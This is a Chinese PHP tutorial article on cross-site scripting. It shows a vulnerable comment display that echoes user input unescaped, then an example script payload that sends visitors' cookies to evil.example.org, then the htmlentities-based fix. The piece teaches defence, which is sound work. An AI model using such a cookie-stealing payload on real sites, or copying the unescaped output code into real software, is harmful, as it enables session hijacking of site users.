首頁  >  文章  >  後端開發  >  PHP安全-跨站腳本攻擊

PHP安全-跨站腳本攻擊

黄舟
黄舟原創
2017-02-22 09:23:262107瀏覽



 跨站腳本攻擊

  跨站腳本攻擊是眾所周知的攻擊方式之一。所有平台上的Web應用程式都深受其擾,PHP應用也不例外。

  所有有輸入的應用都面臨風險。 Webmail,論壇,留言本,甚至是Blog。事實上,大多數Web應用程式提供輸入是出於更吸引人氣的目的,但同時這也會把自己置於危險之中。如果輸入沒有正確地進行過濾和轉義,跨站腳本漏洞就產生了。

  以一個允許在每個頁面上輸入評論的應用程式為例,它使用了下面的表單來幫助使用者提交:

CODE:

 

<form action="comment.php" method="POST"
/>
  <p>Name: <input type="text" name="name"
/><br />
  Comment: <textarea name="comment" rows="10"
cols="60"></textarea><br />
  <input type="submit" value="Add Comment"
/></p>
  </form>


#程式向其他造訪該頁面的用戶顯示評論。例如,類似下面的程式碼片段可能用來輸出一個註解($comment)及與之對應的發表人($name):

##CODE:

 

<?php
 
  echo "<p>$name writes:<br />";
  echo
"<blockquote>$comment</blockquote></p>";
 
  ?>


#這個流程對$comment及$name的值給予了充分的信任,想像一下它們中的一個的內容包含如下程式碼:

CODE:

 #

<script>
  document.location =
    &#39;http://evil.example.org/steal.php?cookies=&#39;
+
    document.cookie
  </script>


#如果你的使用者察看這篇評論時,這與你允許別人在你的網站原始程式中加入Javascript程式碼無異。你的使用者會在不知不覺中把他們的cookies(瀏覽網站的人)送到evil.example.org,而接收程式(steal.php)可以透過$_GET['cookies']變數防問所有的cookies 。

  這是一個常見的錯誤,主要是由於不好的程式設計習慣所引發的。幸運的是這類錯誤很容易避免。由於這種風險只在你輸出了被污染資料時發生,所以只要確保做到如第一章所述的過濾輸入及轉義輸出即可

##  最起碼你要用htmlentities( )對任何你要輸出到客戶端的資料進行轉義。此函數可以把所有的特殊字元轉換成HTML表示方式。所有會引起瀏覽器進行特殊處理的字元在進行了轉換後,就能確保顯示出來的是原來輸入的內容。

  由此,用下面的程式碼顯示註解是比較安全的:

CODE:

 

<?php
 
  $clean = array();
  $html = array();
 
  /* Filter Input ($name, $comment) */
 
  $html[&#39;name&#39;] = htmlentities($clean[&#39;name&#39;],
ENT_QUOTES, &#39;UTF-8&#39;);
  $html[&#39;comment&#39;] = htmlentities($clean[&#39;comment&#39;],
ENT_QUOTES, &#39;UTF-8&#39;);
 
  echo "<p>{$html[&#39;name&#39;]} writes:<br
/>";
  echo
"<blockquote>{$html[&#39;comment&#39;]}</blockquote></p>";
 
  ?>

以上就是PHP安全-跨站腳本攻擊的內容,更多相關內容請關注PHP中文網(www.php .cn)!

陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn